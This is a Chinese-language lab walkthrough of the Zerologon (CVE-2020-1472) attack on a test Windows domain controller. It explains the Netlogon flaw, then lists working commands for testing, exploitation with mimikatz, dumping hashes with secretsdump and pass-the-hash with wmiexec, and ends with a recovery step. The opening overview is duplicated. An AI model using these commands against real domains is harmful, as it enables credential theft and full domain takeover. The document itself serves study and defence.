漏洞概述：

這是近幾年windows上比較重量級別的一個漏洞。通過該漏洞，攻擊者只需能夠訪問域控的445端口，在無需任何憑據的情況下（可以在域外）能拿到域管的權限。該漏洞的產生來源于Netlogon協議認證的加密模塊存在缺陷，導致攻擊者可以在沒有憑證的情況情況下通過認證。該漏洞的最穩定利用是調用netlogon中RPC函數NetrServerPasswordSet2來重置域控的密碼，從而以域控的身份進行Dcsync獲取域管權限。這個漏洞的完整利用需要域控開啟135和445端口這是近幾年windows上比較重量級別的一個漏洞。通過該漏洞，攻擊者只需能夠訪問域控的445端口，在無需任何憑據的情況下能拿到域管的權限。該漏洞的產生來源于Netlogon協議認證的加密模塊存在缺陷，導致攻擊者可以在沒有憑證的情況情況下通過認證。該漏洞的最穩定利用是調用netlogon中RPC函數NetrServerPasswordSet2來重置域控的密碼，從而以域控的身份進行Dcsync獲取域管權限。這個漏洞的完整利用需要域控開啟135和445端口。

注意：漏洞利用成功后是把域控這個機器用戶的密碼置為空，與域管的密碼無關。

實驗環境

域名：HIRO
域控：WIN-KONG@192.168.228.10 域管：hiro\administrator

驗證

用zerologon_tester.py驗證是否有CVE-2020-1472漏洞

攻擊：

1.使用CVE-2020-1472exp（需要先代理）

這一步會把域控的密碼置為空 #即hash為31d6cfe0d16ae931b73c59d7e0c089c0

自己本地驗證看攻擊是否成功(ntlmhash為空)

前后對比

2.使用mimikatz(要用支持zerologon的版本)

(1)如果當前主機不在域環境中，target指向ip
lsadump::zerologon /target:192.168.228.10 /ntlm /null /account:win-kong$ /exploit

(2)如果當前主機在域環境中，target指向FQDN

利用（使用impacket包）

攻擊成功后讀取域內密碼hash(域控機器賬號有DCSync權限)
python3 secretsdump.py hiro.com/WIN-KONG$@192.168.228.10 -no-pass

哈希傳遞(administrator)
python3 .\wmiexec.py hiro/administrator@192.168.228.10 -hashes aad3b435b51404eeaad3b435b51404ee:e9bf196dc93a1219e3b2e79b1b7aa36e

恢復脫域的域控

在攻擊過程中，將機器的密碼置為空，這一步是會導致域控脫域的。其本質原因是由于機器用戶在AD中的密碼(存儲在ntds.dic)與本地的注冊表lsass里面的密碼不一致導致的。所以要將其恢復，將AD中的密碼與注冊表lsass里面的密碼保持一致。
像服務器一樣，DC擁有一個帶有密碼的機器帳戶，該帳戶以加密方式存儲在注冊表中。引導時將其加載到lsass中。如果使用Zerologon更改密碼，則僅AD中的密碼會更改，而不是注冊表或lsass中的密碼。利用后每當發出新的Kerberos票證時，DC無法使用lsass中的機器帳戶密碼來解密服務票證，并且無法使用Kerberos中斷身份驗證。
恢復域控機器密碼：
在域控上執行： powershell Reset-ComputerMachinePassword

最后對比